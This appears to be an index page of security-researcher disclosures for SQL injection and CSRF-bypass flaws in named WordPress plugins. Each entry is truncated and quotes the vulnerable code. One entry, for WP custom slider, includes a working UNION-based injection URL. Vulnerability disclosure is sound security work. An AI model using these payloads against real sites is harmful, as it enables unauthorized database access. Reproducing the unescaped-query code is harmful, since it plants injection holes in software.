Exploiting vulnerability in logical operators “isset (…) && !Anything”

Look this code: if ( isset( $_POST[‘cartflows-action-nonce’] ) && ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST[‘cartflows-action-nonce’] ) ), ‘cartflows-action-nonce’ ) ) { return; } This code was taken from a WordPress plugin with more than 100,000 active downloads, Cartflows (https://wordpress.org/plugins/cartflows/). This condition is a security validation to block CSRF, it works to …

WP Events 2.3.4 WordPress Plugin – Sql Injetcion

Homepage: https://wordpress.org/plugins/wp-events/ Description: Type user acces: administrator user. $_GET[‘edit_event’] is not escaped. File / Code: Path Request: /wp-content/plugins/wp-events/wp-events.php Line :  450 – 468 if ( isset( $_GET[‘edit_event’] ) ) { $event_edit_id = esc_attr( $_GET[‘edit_event’] ); } … $edit_event = $wpdb->get_row( “SELECT * FROM `{$wpdb->prefix}events` WHERE `id` = {$event_edit_id}” ); Proof …

Active Directory Integration 1.1.8 – WordPress Plugin – Sql Injection

Homepage: https://wordpress.org/plugins/active-directory-integration/ Description: Type user acces: administrator user. Target need have configured ldap and active. $_GET[‘userid’] is not escaped. File / Code: Path Request: /wp-content/plugins/active-directory-integration/syncback.php Line :  135 $result = $ADI->bulksyncback( $_GET[‘userid’] ); Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php Line: 142 // They must have a wp_usermeta.metakey = ‘adi_samaccount’ with a not empty …

Link-Library 5.9.13.26 Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/link-library/ Description: Type user access:  is accessible only admin user. $_GET[‘linkid’] is not escaped. Attack with Sql Injection File / Code: Path: /wp-content/plugin/link-library/link-library-admin.php Line: 686 if ( isset( $_GET[‘genthumbsingle’] ) || isset( $_GET[‘genfaviconsingle’] ) ) { $linkquery .= ” AND l.link_id = ” . $_GET[‘linkid’]; } $linkitems = $wpdb->get_results( $linkquery …

Dsubscribers – 1.2 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/dsubscribers/ Description: Type user access:  is accessible only admin user. $_REQUEST[‘dsubscribers’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/dsubscribers/includes/class-dsubscribers-table.php Line: 40 global $wpdb; $table_name = $wpdb->prefix . “dsubscribers”; $row = $wpdb->get_row(“SELECT * FROM $table_name WHERE id=$id”); ?> } Proof of Concept: 1 – Login with admin user: …

Ultimate Product Catalogue 4.2.2 Sql Injection

Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ Description: Type user access: register user. $_POST[‘CatID’] is not escaped. File / Code: Path: /wp-content/plugins/ultimate-product-catalogue/Functions/Process_Ajax.php Line: 147 global $subcategories_table_name; $Path = ABSPATH . ‘wp-load.php’; include_once($Path); global $wpdb; $SubCategories = $wpdb->get_results(“SELECT SubCategory_ID, SubCategory_Name FROM $subcategories_table_name WHERE Category_ID=” . $_POST[‘CatID’]); foreach ($SubCategories as $SubCategory) {$Response_Array[] = $SubCategory->SubCategory_ID; $Response_Array[] = $SubCategory->SubCategory_Name;} if …

WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-email-users/ Description: Type user access:  is accessible for any registered user $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-email-users/wp-email-user-ajax.php Line: 197 if($temp_sel_key == ‘select_temp’){ $myrows = $wpdb->get_results( “SELECT template_value FROM `”.$table_name.”` where id = $temp”); $data=$myrows[0]->template_value; } Proof of Concept: 1 – Login as regular user …

Wp custom slider 1.6.2 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-custom-slider/ Description: Type user access: admin user. $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php Line: 371 if(isset($_REQUEST[‘edit’])) { $id=$_REQUEST[‘edit’]; $query_pag_data=$wpdb->get_results(“select * from “.$wpdb->prefix.”customslider_images where id=$id”); ?> Proof of Concept: 1 – Login with admin user. 2 – Url with injection: http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1 2 – Result:     Timeline: …

ZM Gallery 1 Plugin WordPress – Blind Injection

Homepage: https://wordpress.org/plugins/zm-gallery/ Description: Type user access: admin user. $_GET[‘order’] is escaped wrong. Attack with Blind Injection File / Code: Path: /wp-content/plugin/zm-gallery/zm-gallery-list.php Line: 126 if( isset($_GET[‘orderby’]) ) { $order = ‘ ORDER BY ‘ . esc_sql($_GET[‘orderby’]); if( isset($_GET[‘order’]) ) { $order .= ‘ ‘ . esc_sql($_GET[‘order’]); } } $table_name = $wpdb->prefix . ‘zm_gallery’; …

ZX_CSV Upload 1 Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/zx-csv-upload/ Description: Type user access: admin user. $_GET[‘id’] is not escaped. Url is accessible for every registered user. File / Code: Path: /wp-content/plugin/zx-csv-upload/zx_csv_home.php Line: 53 if(isset($_POST[‘rsltsbmt’])) { $table_name = $_POST[‘table_select’]; $rlfrom=$_POST[‘rsltfrom’]; $rlto=$_POST[‘rsltto’]; } … global $wpdb; //$tname=$wpdb->prefix.’currency’; $result = $wpdb->get_results( “SELECT * FROM $table_name limit $rlfrom,$rlto”); ?> Proof of Concept: 1 …

Back to Top